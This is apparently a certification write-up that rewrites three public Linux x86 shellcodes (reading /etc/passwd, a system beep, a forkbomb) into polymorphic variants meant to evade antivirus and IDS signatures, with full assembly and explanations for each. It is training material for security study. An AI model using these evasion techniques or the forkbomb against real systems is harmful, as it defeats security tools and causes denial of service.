SLAE32 0x06: Polymorphic Shell-Storm Shellcode

11 minute read

Polymorphic shellcode can be described as any shellcode that performs the same function as an existing shellcode, but with different instructions. In a similar vein to encoded shellcode, polymorphic shellcode is most commonly used in an attempt to evade anti-virus software and intrusion detection systems.

Generally speaking, anti-virus software and intrusion detection systems (IDS) scan data for known patterns (signatures) that correspond to known malicious code or computer viruses. If an anti-virus software or IDS system detects such patterns, then the code will not be executed by the system. As a way to circumvent this, polymorphic shellcode can be used in place of the original shellcode with the hopes that the signature for the polymorphic shellcode is not in the signature database of the anti-virus or IDS software.

The rest of this post will analyze three existing shellcodes taken from the Shell-Storm website. Using these shellcodes as a starting point, a polymorphic shellcode will be created through modification of the original shellcode. The changes made to each shellcode will be explained as part of the exercise.


Create 3 polymorphic shellcodes from 3 pre-existing Shell-Storm shellcodes;

  1. Each polymorphic shellcode should not be longer than 150% of the pre-existing shellcode
  2. Extra points for if the polymorphic shellcode is shorter than the pre-existing shellcode

Shellcode I: /bin/cat /etc/passwd

Shellcode I: Explanation

The first shellcode that will be examined and altered is /bin/cat /etc/passwd. This shellcode uses the execve system call to execute the command /bin/cat /etc/passwd on the system on which the shellcode is run. The execve system call has been explained in many previous posts and therefore will not be explained here.

The original Shell-Storm shellcode can be found here.

Shellcode I: Original Assembly & Shellcode

The assembly instructions for the unmodified /bin/cat /etc/passwd shellcode are shown below:

global _start

section .text
    xor eax, eax 
    push edx 
    push dword 0x7461632f
    push dword 0x6e69622f
    mov ebx, esp 
    push edx 
    push dword 0x64777373
    push dword 0x61702f2f
    push dword 0x6374652f
    mov ecx, esp 
    mov al, 0xb 
    push edx 
    push ecx 
    push ebx 
    mov ecx, esp 
    int 0x80

After compiling and linking the assembly code above, the bash one-liner that has been used in previous posts can be used to generate the hexadecimal shellcode shown below. The original /bin/cat /etc/passwd shellcode is 43 bytes in length.


Shellcode I: Original Demonstration

This shellcode can be demonstrated by placing the shellcode shown above in an sc_test.c file. The sc_test.c file used to test the shellcode here is the same sc_test.c shellcode that has been used in previous posts. After compiling sc_test.c using the gcc -m32 -fno-stack-protector -z execstack sc_test.c -o sc_test command, the binary can be executed. Upon execution, the program prints the contents of the /etc/passwd file to the terminal. A demonstration of this is shown below.

root@kali:~/workspace/SLAE/assignments/0x06# ./sc_test                                                                           
Shellcode Length: 43                                                                                                             

Shellcode I: Morphed Assembly & Shellcode

The original assembly code has been modified and is shown in full below. Comments have been added to the assembly code to show where changes have been made. An explanation of these changes follows the code.

global _start

section .text
    xor eax, eax 
    mul eax                     ; change #1
    push edx 
    push dword 0x7461632f
    push dword 0x6e69622f
    mov ebx, esp 
    push edx 
    jmp short jump_a            ; change #2

    pop ecx                     ; change #3
    mov al, 0xb 
    push edx 
    push ecx 
    push ebx 
    mov ecx, esp 
    int 0x80

    call call_a
    db '/etc/passwd'

For the first change, in the original assembly code, an XOR instruction and a CDQ instruction were used at the beginning of the program to clear the necessary registers. In the modified shellcode, a MUL EAX instruction was used in place of CDQ. In this case, the MUL EAX instruction results in the EAX and the EDX registers being cleared. The MUL instruction was discussed in more detail in a previous post.

For the second change, the original shellcode used three PUSH instructions to store a string on the stack. Converting the pushed bytes to ASCII reveals that the string is /etc//passwd, as shown below.

>>> print('\x64\x77\x73\x73\x61\x70\x2f\x2f\x63\x74\x65\x2f')

In the modified shellcode, a ‘JUMP-CALL-POP’ technique is used to accomplish this task. In the modified program, the JMP SHORT jump_a instruction redirects execution to the jump_a label. At the jump_a label, a CALL instruction is used to store the memory address immediately following the CALL to the stack and to redirect execution to the call_a label. In this case, the memory address immediately following the CALL instruction contains the string /etc/passwd as defined by the DB instruction.

For the third change, as execution flow continues at the call_a label, a POP ECX instruction is used in place of a MOV ECX, ESP instruction in the original assembly code. The functionality provided by these two different instructions accomplish the same task.

The shellcode resulting from the modified version of /bin/cat /etc/passwd is 46 bytes (3 bytes longer than the original shellcode) and is shown below.


Shellcode I: Morphed Demonstration

The modified shellcode can be tested in the same manner as the original shellcode. Once again, the sc_test.c program was used to test the shellcode. Upon compiling sc_test.c with the modified shellcode and executing sc_test, the contents of /etc/passwd is printed to the terminal as expected. A sample of the output is shown below.

root@kali:~/workspace/SLAE/assignments/0x06# ./sc_test                                                                           
Shellcode Length: 46                                                                                                             

Shellcode II: System Beep

Shellcode II: Explanation

The second shellcode that will be examined and altered is the ‘System Beep’ shellcode. This shellcode uses two system calls to complete the task of making the system on which the code is executed issue a low tone audible beep. The system calls used in this shellcode are open and iotcl.

The original Shell-Storm shellcode can be found here.

Shellcode II: Original Assembly & Shellcode

The assembly instructions for the unmodified ‘System Beep’ shellcode are shown below:

global _start

section .text
    push byte 5
    pop eax 
    push edx 
    push 0x30317974
    push 0x742f2f2f
    push 0x7665642f
    mov ebx, esp 
    mov ecx, edx 
    int 0x80
    mov ebx, eax 
    push byte 54
    pop eax 
    mov ecx, 4294948047
    not ecx 
    mov edx, 66729180
    int 0x80

After compiling and linking the assembly code above, the bash one-liner mentioned previously can be used to generate the hexadecimal shellcode shown below. The original ‘System Beep’ shellcode is 45 bytes in length.


Shellcode II: Original Demonstration

The ‘System Beep’ shellcode can be tested in the same manner as outlined previously for the /bin/cat /etc/passwd shellcode. Once again, the sc_test.c file containing the shellcode shown above was compiled with the gcc -m32 -fno-stack-protector -z execstack sc_test.c -o sc_test command which compiles the sc_test binary. Running the sc_test binary that was compiled with the ‘System Beep’ shellcode from above results in the system producing an audible low-pitched ‘beep’. The sc_test binary additionally prints the length of the shellcode, which is 45 bytes, as shown below. Note that this code results in a Segmentation Fault error.

root@kali:~/workspace/SLAE/assignments/0x06# ./sc_test 
Shellcode Length: 45
Segmentation fault

Shellcode II: Morphed Assembly & Shellcode

The original assembly code has been modified and is shown in full below. Comments have been added to the assembly code to show where changes have been made. An explanation of these changes follows the code.

global _start

section .text
    xor eax, eax                ; change #1
    mul ecx 
    mov cl, 5

loop_inc:                       ; change #2
    inc eax 
    loop loop_inc
    push edx 
    jmp short jump_a            ; change #3
    pop ebx                     ; change #4
    int 0x80
    xchg ebx, eax               ; change #5
    push byte 54
    pop eax 
    mov ecx, 4294948047
    not ecx 
    mov edx, 66729180
    int 0x80

    call call_a
    db '/dev/tty10'

In a manner similar to the case outlined in the /bin/cat /etc/passwd assembly and shellcode, the first change to the ‘System Beep’ assembly code involves how the required registers are zereod out. In the modified shellcode, an XOR EAX instruction and a MUL ECX instruction are used to clear the required registers. The MUL instruction was discussed in more detail in a previous post. In contrast to the original shellcode, the modified shellcode moves the value 5 into the CL register with the MOV CL, 5 instruction.

The second change noted within the modified ‘System Beep’ assembly code involves how the value of 5 is placed in the EAX register for the open system call. In the modifed assembly code, a loop is used to increase the value in EAX from 0 to 5. The LOOP loop_inc instruction will repeat the insructions between itself and the loop_inc label until the value in ECX is 0. As the value 5 was moved into CL as mentioned previously, this will result in the EAX register containing the value 5 as the LOOP instruction completes. This method is in contrast to the much simpler method used in the original shellcode of pushing the value 5 to the stack and subsequently storing it in EAX with a POP EAX instruction.

The third change involves the use of the ‘JUMP-CALL-POP’ technique. This technique is used in the same way as explained previously in the /bin/cat /etc/passwd example. In the modified program, the JMP SHORT jump_a instruction redirects execution to the jump_a label. At the jump_a label, a CALL instruction is used to store the memory address immediately following the CALL to the stack and to redirect execution to the call_a label. In this case, the memory address immediately following the CALL instruction contains the string /dev/tty10 as defined by the DB instruction.

The /dev/tty10 value can be confirmed by examing the bytes pushed to the stack by the three concurrent PUSH instructions in the original assembly code, as shown below.

>>> print('\x30\x31\x79\x74\x74\x2f\x2f\x2f\x76\x65\x64\x2f')

The fourth and fifth changes are simple changes. The fourth change uses a POP EBX instruction to store ESP in the EBX register instead of the MOV EBX, ESP instruction used n the original assembly code. The fifth change implements an XCHG EBX, EAX instruction instead of a MOV EBX, EAX command.

The shellcode resulting from the modified version of ‘System Beep’ is 48 bytes (3 bytes longer than the original shellcode) and is shown below.


Shellcode II: Morphed Demonstration

The modified assembly code can be tested using the sc_test.c file once again. After compiling sc_test.c, the binary sc_test will produce the same low-pitched beep as the original shellcode. Interestingly enough, the modified shellcode does not result in a Segmentation Fault error as the original shellcode did.

root@kali:~/workspace/SLAE/assignments/0x06# ./sc_test 
Shellcode Length: 48

Shellcode III: Forkbomb

Shellcode III: Explanation

The third and final shellcode that will be analyzed and modified is the short, simple, yet highly effective ‘Forkbomb’ shellcode. Don’t let the length and the simplicity of this shellcode fool you, for its effects are powerful. Just 7 bytes in length, the shellcode packs a powerful punch in the form of a denial of service when executed. The ‘Forkbomb’ shellcode utilizes the fork system call to accomplish this task.

From man fork, the fork function creates a new process by duplicating the calling process. The denial of service shellcode loops over the fork system call indefinitely, until the system on which the code is run is depleted of memory.

The original Shell-Storm shellcode can be found here.

Shellcode III: Original Assembly & Shellcode

The assembly instructions for the unmodified ‘Forkbomb’ shellcode are shown below:

global _start

section .text
    push byte 2
    pop eax
    int 0x80
    jmp short _start

After compiling and linking the assembly code above, the bash one-liner that has been mentioned previously can be used to generate the hexadecimal shellcode shown below. The original ‘Forkbomb’ shellcode is 7 bytes in length.


Shellcode III: Original Demonstration

Note: Run this code at your own risk!

The ‘Forkbomb’ shellcode is difficult to demonstrate, as after running it, the system on which it is executed will very quickly (almost immediately) lock up. The system or virtual machine must be rebooted after executing the shellcode.

Shellcode III: Morphed Assembly & Shellcode

The original assembly code has been modified and is shown in full below. Comments have been added to the assembly code to show where changes have been made. An explanation of these changes follows the code.

global _start

section .text
    xor eax, eax                ; change #1
    mov al, 1                   ; change #2
    inc eax                     ; change #3
    int 0x80            
    jmp _start                  ; change #4

The first change involves the use of an XOR EAX, EAX instruction. A similar instruction is not used in the original shellcode, as it is not necessary. The second change is the use of a MOV AL, 1 instruction. This instruction is used to set up EAX for the upcoming fork system call. The INC EAX instruction is the third change and serves to complete the set up of the EAX register for the fork system call. After the MOV AL, 1 and the INC EAX instructions, the EAX register holds the value 2 which specifies the fork system call in the unistd_32.h file mentioned in previous posts. Finally, the jmp _start instruction is used in place of a jmp short _start instruction in the original shellcode.

The shellcode resulting from the modified version of ‘Forkbomb’ is 9 bytes (2 bytes longer than the original shellcode) and is shown below. Note that only three of the bytes present in the original shellcode are present in the modified shellcode.


Shellcode III: Morphed Demonstration

As mentioned before, this shellcode should be tested at your own risk as it will lock up a system upon execution. The modified shellcode from above can be succsfully executed using sc_test.c and sc_test as described previously.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-1469